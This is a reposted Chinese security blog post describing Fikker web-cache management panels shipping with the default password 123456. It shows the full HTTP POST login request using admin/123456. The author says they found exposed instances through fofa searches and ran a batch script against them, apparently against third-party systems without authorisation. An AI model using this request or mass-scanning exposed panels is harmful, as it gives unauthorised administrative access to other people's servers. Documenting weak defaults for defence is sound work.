Fikker 管理平台弱口令

本文轉載自查看原文 2021-06-23 17:11 442 Web安全

官網：www.fikker.com

應用介紹：Fikker 是一款面向 CDN/站長的專業級網站緩存（Webcache）和反向代理服務器軟件（Reverse Proxy Server）。

發現過程：查看源代碼知道默認密碼為123456

Post數據包為：

POST /fikker/webcache.fik?type=sign&cmd=in HTTP/1.1
Accept: */*
Referer: http://xxx:6780/fikker/login.htm
Accept-Language: zh-CN
Content-Type: text/plain;charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 46
Host: xxx:6780
Pragma: no-cache
Cookie: FIKKERVERISONEXT=Linux/64Bits
Connection: close

RequestID=LOGIN&Username=admin&Password=123456

通過fofa查詢還是存在不少系統

最后寫了個腳本批量跑了一下還是有一些存在

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 弱口令檢測 BUUCTF Misc 弱口令漏洞挖掘之弱口令淺析弱口令 jenkins弱口令漏洞弱口令漏洞詳解 Tomcat弱口令弱口令簡介弱口令分類 msf各種弱口令爆破